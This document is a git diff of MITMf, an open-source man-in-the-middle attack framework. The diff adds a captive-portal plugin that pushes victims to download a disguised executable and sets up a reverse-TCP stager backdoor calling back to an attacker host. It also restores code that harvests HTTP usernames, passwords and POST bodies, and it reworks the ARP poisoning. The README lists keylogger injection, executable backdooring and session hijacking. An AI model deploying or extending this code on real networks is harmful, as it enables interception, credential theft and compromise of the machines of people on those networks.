diff --git a/.coveragerc b/.coveragerc
new file mode 100644
index 0000000..2a138cb
--- /dev/null
+++ b/.coveragerc
@@ -0,0 +1,8 @@
+[run]
+branch = True
+
+[report]
+include = *core*, *libs*, *plugins*
+exclude_lines =
+ pragma: nocover
+ pragma: no cover
diff --git a/.gitignore b/.gitignore
index 0860090..acdb2f6 100644
--- a/.gitignore
+++ b/.gitignore
@@ -57,3 +57,7 @@ docs/_build/
# PyBuilder
target/
+
+# OSX Stuff
+.DS_Store
+._.DS_Store
diff --git a/.travis.yml b/.travis.yml
index 8d2267b..1656a7a 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,11 +1,27 @@
language: python
python:
- "2.7"
-sudo: required
-before_install:
- - "ifconfig"
- - "sudo apt-get update -qq"
- - "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev"
+
+addons:
+ apt:
+ packages:
+ - libpcap0.8-dev
+ - libnetfilter-queue-dev
+ - libssl-dev
+
+notifications:
+ irc:
+ channels:
+ - "irc.freenode.org#MITMf"
+ template:
+ - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
+ skip_join: true
+ use_notice: true
install: "pip install -r requirements.txt"
-script: nosetests
\ No newline at end of file
+before_script:
+ - "pip install python-coveralls"
+script:
+ - "nosetests --with-cov"
+after_success:
+ - coveralls
diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md
index 117d02f..d0f9f61 100644
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -1,4 +1,4 @@
-#Intentional contributors (in no particular order)
+# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
@@ -13,7 +13,7 @@
- @auraltension
- @HAMIDx9
-#Unintentional contributors and/or projects that I stole code from
+# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
diff --git a/README.md b/README.md
old mode 100644
new mode 100755
index a52fb9a..2b60ea0
--- a/README.md
+++ b/README.md
@@ -3,11 +3,14 @@

[](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[](https://travis-ci.org/byt3bl33d3r/MITMf)
+[](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
-#MITMf
+# MITMf
Framework for Man-In-The-Middle attacks
+**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
+
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
@@ -15,7 +18,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
-- Email: byt3bl33d3r@gmail.com
+- Email: byt3bl33d3r@protonmail.com
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
@@ -111,13 +114,33 @@ Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
+Start a captive portal that redirects everything to http://SERVER/PATH:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
+
+Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
+
+Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
+
+Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.conf):
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
+
+Same as above but with hostname:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
+
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
-#Currently available plugins
+# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
@@ -127,12 +150,22 @@ For a complete list of available options, just run ```python mitmf.py --help```
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
-- **Ferret-NG** : Transperently hijacks client sessions
+- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
-- **Replace** : Replace arbitary content in HTML content
+- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
+- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
+
+# How to fund my tea & sushi reserve
+
+BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
+
+ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
+
+LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
+
diff --git a/config/captive/portal.html b/config/captive/portal.html
new file mode 100755
index 0000000..80b0cac
--- /dev/null
+++ b/config/captive/portal.html
@@ -0,0 +1,31 @@
+
+
+Captive Portal
+
+
+
+
+
+
+
Client Required
+
+
+
+
- Access has been blocked. Please download and install the new Captive Portal Client in order to access internet resources.
+
+
+
+
+
+
+
+
diff --git a/config/mitmf.conf b/config/mitmf.conf
old mode 100644
new mode 100755
index 6832dce..1e78825
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@@ -38,6 +38,7 @@
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27
+ *.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@@ -75,11 +76,19 @@
#
# Plugin configuration starts here
#
+[Captive]
+
+ # Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
+ Port = 8080
+ ServerString = "Captive Server 1.0"
+
+ # Set the filename served as /CaptivePortal.exe by integrated http server
+ PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
- 'Google Search' = 'Google yssas'
+ 'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@@ -89,7 +98,7 @@
# Here you can specify the client to hijack sessions from
#
- Client = '192.168.1.26'
+ Client = '10.0.237.91'
[SSLstrip+]
@@ -445,10 +454,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
- HOST = 192.168.1.16
+ HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
- SHELL = iat_reverse_tcp_inline_threaded
+ SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
@@ -503,7 +512,7 @@
LinuxType = None
WindowsType = ALL
CompressedFiles = False
- #inherits WindowsIntelx32 from ALL
+ #inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
diff --git a/core/banners.py b/core/banners.py
index 51438c8..a463ffa 100644
--- a/core/banners.py
+++ b/core/banners.py
@@ -65,6 +65,18 @@ banner4 = """
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
"""
+banner5 = """
+@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
+@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
+@@! @@! @@! @@! @@! @@! @@! @@! @@!
+!@! !@! !@! !@! !@! !@! !@! !@! !@!
+@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
+!@! ! !@! !!! !!! !@! ! !@! !!!!!:
+!!: !!: !!: !!: !!: !!: !!:
+:!: :!: :!: :!: :!: :!: :!:
+::: :: :: :: ::: :: ::
+ : : : : : : :
+"""
+
def get_banner():
- banners = [banner1, banner2, banner3, banner4]
- return random.choice(banners)
+ return random.choice([banner1, banner2, banner3, banner4, banner5])
diff --git a/core/beefapi.py b/core/beefapi.py
index 7a66797..e427619 100644
--- a/core/beefapi.py
+++ b/core/beefapi.py
@@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log))
return logs
+ def update(self, options={}):
+ headers = {"Content-Type": "application/json", "charset": "UTF-8"}
+ payload = json.dumps(options)
+ r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
+ return r.json()
+
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
diff --git a/core/configwatcher.py b/core/configwatcher.py
index 7f7b955..95716de 100644
--- a/core/configwatcher.py
+++ b/core/configwatcher.py
@@ -21,7 +21,7 @@ import pyinotify
import threading
from configobj import ConfigObj
-class ConfigWatcher(pyinotify.ProcessEvent):
+class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py
index 5cd085d..f35fe2b 100644
--- a/core/ferretng/ServerConnection.py
+++ b/core/ferretng/ServerConnection.py
@@ -110,7 +110,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
- log.debug("[ServerConnection] Zapped a strict-trasport-security header")
+ log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'):
self.contentLength = value
diff --git a/core/mitmfapi.py b/core/mitmfapi.py
index 710ae98..195b8d2 100644
--- a/core/mitmfapi.py
+++ b/core/mitmfapi.py
@@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher):
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
- ProxyPlugins().addPlugin(p)
+ ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
- ProxyPlugins().removePlugin(p)
+ ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
@@ -97,4 +97,4 @@ class mitmfapi(ConfigWatcher):
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
- api_thread.start()
\ No newline at end of file
+ api_thread.start()
diff --git a/core/netcreds.py b/core/netcreds.py
index 5daa6b8..5518852 100644
--- a/core/netcreds.py
+++ b/core/netcreds.py
@@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
+parsing_pcap = False
+
class NetCreds:
version = "1.0"
@@ -51,15 +53,64 @@ class NetCreds:
except Exception as e:
if "Interrupted system call" in e: pass
- def start(self, interface, ip, pcap):
- if pcap:
- for pkt in PcapReader(pcap):
- pkt_parser(pkt)
- sys.exit()
- else:
- t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
- t.setDaemon(True)
- t.start()
+ def start(self, interface, ip):
+ t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
+ t.setDaemon(True)
+ t.start()
+
+ def parse_pcap(self, pcap):
+ global parsing_pcap; parsing_pcap = True
+
+ for pkt in PcapReader(pcap):
+ pkt_parser(pkt)
+
+ sys.exit()
+
+def frag_remover(ack, load):
+ '''
+ Keep the FILO OrderedDict of frag loads from getting too large
+ 3 points of limit:
+ Number of ip_ports < 50
+ Number of acks per ip:port < 25
+ Number of chars in load < 5000
+ '''
+ global pkt_frag_loads
+
+ # Keep the number of IP:port mappings below 50
+ # last=False pops the oldest item rather than the latest
+ while len(pkt_frag_loads) > 50:
+ pkt_frag_loads.popitem(last=False)
+
+ # Loop through a deep copy dict but modify the original dict
+ copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+ for ip_port in copy_pkt_frag_loads:
+ if len(copy_pkt_frag_loads[ip_port]) > 0:
+ # Keep 25 ack:load's per ip:port
+ while len(copy_pkt_frag_loads[ip_port]) > 25:
+ pkt_frag_loads[ip_port].popitem(last=False)
+
+ # Recopy the new dict to prevent KeyErrors for modifying dict in loop
+ copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+ for ip_port in copy_pkt_frag_loads:
+ # Keep the load less than 75,000 chars
+ for ack in copy_pkt_frag_loads[ip_port]:
+ # If load > 5000 chars, just keep the last 200 chars
+ if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
+ pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
+
+def frag_joiner(ack, src_ip_port, load):
+ '''
+ Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
+ '''
+ for ip_port in pkt_frag_loads:
+ if src_ip_port == ip_port:
+ if ack in pkt_frag_loads[src_ip_port]:
+ # Make pkt_frag_loads[src_ip_port][ack] = full load
+ old_load = pkt_frag_loads[src_ip_port][ack]
+ concat_load = old_load + load
+ return OrderedDict([(ack, concat_load)])
+
+ return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
@@ -127,53 +178,7 @@ def pkt_parser(pkt):
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
- other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
-
-def frag_remover(ack, load):
- '''
- Keep the FILO OrderedDict of frag loads from getting too large
- 3 points of limit:
- Number of ip_ports < 50
- Number of acks per ip:port < 25
- Number of chars in load < 5000
- '''
- global pkt_frag_loads
-
- # Keep the number of IP:port mappings below 50
- # last=False pops the oldest item rather than the latest
- while len(pkt_frag_loads) > 50:
- pkt_frag_loads.popitem(last=False)
-
- # Loop through a deep copy dict but modify the original dict
- copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
- for ip_port in copy_pkt_frag_loads:
- if len(copy_pkt_frag_loads[ip_port]) > 0:
- # Keep 25 ack:load's per ip:port
- while len(copy_pkt_frag_loads[ip_port]) > 25:
- pkt_frag_loads[ip_port].popitem(last=False)
-
- # Recopy the new dict to prevent KeyErrors for modifying dict in loop
- copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
- for ip_port in copy_pkt_frag_loads:
- # Keep the load less than 75,000 chars
- for ack in copy_pkt_frag_loads[ip_port]:
- # If load > 5000 chars, just keep the last 200 chars
- if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
- pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
-
-def frag_joiner(ack, src_ip_port, load):
- '''
- Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
- '''
- for ip_port in pkt_frag_loads:
- if src_ip_port == ip_port:
- if ack in pkt_frag_loads[src_ip_port]:
- # Make pkt_frag_loads[src_ip_port][ack] = full load
- old_load = pkt_frag_loads[src_ip_port][ack]
- concat_load = old_load + load
- return OrderedDict([(ack, concat_load)])
-
- return OrderedDict([(ack, load)])
+ other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
@@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
-def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
+def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
- http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
+ http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
@@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
else:
host = ''
- #if http_line != None:
- # method, path = parse_http_line(http_line, http_methods)
- # http_url_req = get_http_url(method, host, path, headers)
- #if http_url_req != None:
- #printer(src_ip_port, None, http_url_req)
+ if parsing_pcap is True:
- # Print search terms
- searched = get_http_searches(http_url_req, body, host)
- if searched:
- printer(src_ip_port, dst_ip_port, searched)
+ if http_line != None:
+ method, path = parse_http_line(http_line, http_methods)
+ http_url_req = get_http_url(method, host, path, headers)
+ if http_url_req != None:
+ if verbose == False:
+ if len(http_url_req) > 98:
+ http_url_req = http_url_req[:99] + '...'
+ printer(src_ip_port, None, http_url_req)
- #We dont need this cause its being taking care of by the proxy
-
- #Print user/pwds
- #if body != '':
- # user_passwd = get_login_pass(body)
- # if user_passwd != None:
- # try:
- # http_user = user_passwd[0].decode('utf8')
- # http_pass = user_passwd[1].decode('utf8')
- # # Set a limit on how long they can be prevent false+
- # if len(http_user) > 75 or len(http_pass) > 75:
- # return
- # user_msg = 'HTTP username: %s' % http_user
- # printer(src_ip_port, dst_ip_port, user_msg)
- # pass_msg = 'HTTP password: %s' % http_pass
- # printer(src_ip_port, dst_ip_port, pass_msg)
- # except UnicodeDecodeError:
- # pass
+ # Print search terms
+ searched = get_http_searches(http_url_req, body, host)
+ if searched:
+ printer(src_ip_port, dst_ip_port, searched)
- # Print POST loads
- # ocsp is a common SSL post load that's never interesting
- #if method == 'POST' and 'ocsp.' not in host:
- # try:
- # msg = 'POST load: %s' % body.encode('utf8')
- # printer(src_ip_port, None, msg)
- # except UnicodeDecodeError:
- # pass
+ # Print user/pwds
+ if body != '':
+ user_passwd = get_login_pass(body)
+ if user_passwd != None:
+ try:
+ http_user = user_passwd[0].decode('utf8')
+ http_pass = user_passwd[1].decode('utf8')
+ # Set a limit on how long they can be prevent false+
+ if len(http_user) > 75 or len(http_pass) > 75:
+ return
+ user_msg = 'HTTP username: %s' % http_user
+ printer(src_ip_port, dst_ip_port, user_msg)
+ pass_msg = 'HTTP password: %s' % http_pass
+ printer(src_ip_port, dst_ip_port, pass_msg)
+ except UnicodeDecodeError:
+ pass
+
+ # Print POST loads
+ # ocsp is a common SSL post load that's never interesting
+ if method == 'POST' and 'ocsp.' not in host:
+ try:
+ if verbose == False and len(body) > 99:
+ # If it can't decode to utf8 we're probably not interested in it
+ msg = 'POST load: %s...' % body[:99].encode('utf8')
+ else:
+ msg = 'POST load: %s' % body.encode('utf8')
+ printer(src_ip_port, None, msg)
+ except UnicodeDecodeError:
+ pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
@@ -662,7 +674,10 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
- basic_auth_creds = base64.decodestring(basic_auth_b64)
+ try:
+ basic_auth_creds = base64.decodestring(basic_auth_b64)
+ except Exception:
+ return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
@@ -713,15 +728,13 @@ def headers_to_dict(header_lines):
Convert the list of header lines into a dictionary
'''
headers = {}
- # Incomprehensible list comprehension flattens list of headers
- # that are each split at ': '
- # http://stackoverflow.com/a/406296
- headers_list = [x for line in header_lines for x in line.split(': ', 1)]
- headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
- # Make the header key (like "Content-Length") lowercase
- for header in headers_dict:
- headers[header.lower()] = headers_dict[header]
-
+ for line in header_lines:
+ lineList=line.split(': ', 1)
+ key=lineList[0].lower()
+ if len(lineList)>1:
+ headers[key]=lineList[1]
+ else:
+ headers[key]=""
return headers
def parse_http_line(http_line, http_methods):
@@ -794,9 +807,12 @@ def parse_netntlm_chal(headers, chal_header, ack):
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
- msg2 = header_val2[1]
+ try:
+ msg2 = header_val2[1]
+ except IndexError:
+ return
msg2 = base64.decodestring(msg2)
- parse_ntlm_chal(ack, msg2)
+ parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
@@ -885,10 +901,10 @@ def get_login_pass(body):
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
- 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
+ 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
- 'passwort', 'passwrd', 'wppassword', 'upasswd']
+ , 'passwort', 'passwrd', 'wppassword', 'upasswd', 'senha', 'contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
diff --git a/core/packetfilter.py b/core/packetfilter.py
index e8f0d5d..cd4ad09 100644
--- a/core/packetfilter.py
+++ b/core/packetfilter.py
@@ -1,5 +1,3 @@
-import threading
-
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
@@ -19,22 +17,21 @@ class PacketFilter:
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
- self.nfqueue.bind(1, self.modify)
+ self.nfqueue.bind(0, self.modify)
- t = threading.Thread(name='packetparser', target=self.nfqueue.run)
- t.setDaemon(True)
- t.start()
+ self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
- try:
- execfile(self.filter)
- except Exception:
- log.debug("Error occurred in filter")
- print_exc()
+ for filter in self.filter:
+ try:
+ execfile(filter)
+ except Exception:
+ log.debug("Error occurred in filter {}".format(filter))
+ print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
@@ -42,4 +39,4 @@ class PacketFilter:
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
- iptables().flush()
\ No newline at end of file
+ iptables().flush()
diff --git a/core/poisoners/ARP.py b/core/poisoners/ARP.py
index 24e0b0f..a70af0f 100644
--- a/core/poisoners/ARP.py
+++ b/core/poisoners/ARP.py
@@ -214,8 +214,8 @@ class ARPpoisoner:
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
- self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
- self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
+ self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
+ self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
@@ -242,8 +242,8 @@ class ARPpoisoner:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
- self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
- self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
+ self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
+ self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
diff --git a/core/poisoners/DHCP.py b/core/poisoners/DHCP.py
index cd6ff20..b46cf54 100644
--- a/core/poisoners/DHCP.py
+++ b/core/poisoners/DHCP.py
@@ -79,7 +79,7 @@ class DHCPpoisoner():
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
- return 'generated', random.choice(list(net))
+ return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
diff --git a/core/proxyplugins.py b/core/proxyplugins.py
index efb1833..ff4390e 100644
--- a/core/proxyplugins.py
+++ b/core/proxyplugins.py
@@ -82,7 +82,10 @@ class ProxyPlugins:
self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
- self.plugin_mthds[mthd].remove(p)
+ try:
+ self.plugin_mthds[mthd].remove(getattr(p,pmthd))
+ except KeyError:
+ pass #nothing to remove
def hook(self):
'''Magic to hook various function calls in sslstrip'''
@@ -108,9 +111,10 @@ class ProxyPlugins:
log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook
try:
- for f in self.plugin_mthds[fname]:
- a = f(**args)
- if a != None: args = a
+ if self.plugin_mthds:
+ for f in self.plugin_mthds[fname]:
+ a = f(**args)
+ if a != None: args = a
except Exception as e:
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
log.error("Exception occurred in hooked function")
diff --git a/core/servers/DNS.py b/core/servers/DNS.py
index 54f1889..0599e7b 100755
--- a/core/servers/DNS.py
+++ b/core/servers/DNS.py
@@ -48,6 +48,12 @@ from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
+dnslog = logging.getLogger('dnslog')
+handler = logging.FileHandler('./logs/dns/dns.log',)
+handler.setFormatter(formatter)
+dnslog.addHandler(handler)
+dnslog.setLevel(logging.INFO)
+
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
@@ -69,6 +75,7 @@ class DNSHandler():
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
+ dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
@@ -113,6 +120,7 @@ class DNSHandler():
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
+ dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
@@ -182,6 +190,7 @@ class DNSHandler():
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
+ dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
@@ -257,6 +266,7 @@ class DNSHandler():
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
+ dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
@@ -339,6 +349,7 @@ class DNSHandler():
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
+ dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
@@ -346,6 +357,7 @@ class DNSHandler():
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
+ dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
@@ -354,7 +366,8 @@ class DNSHandler():
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
-
+ if r is None: return None
+
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
@@ -449,7 +462,12 @@ class DNSChef(ConfigWatcher):
# Use alternative DNS servers
if config['nameservers']:
- self.nameservers = config['nameservers'].split(',')
+ self.nameservers = []
+
+ if type(config['nameservers']) is str:
+ self.nameservers.append(config['nameservers'])
+ elif type(config['nameservers']) is list:
+ self.nameservers = config['nameservers']
for section in config.sections:
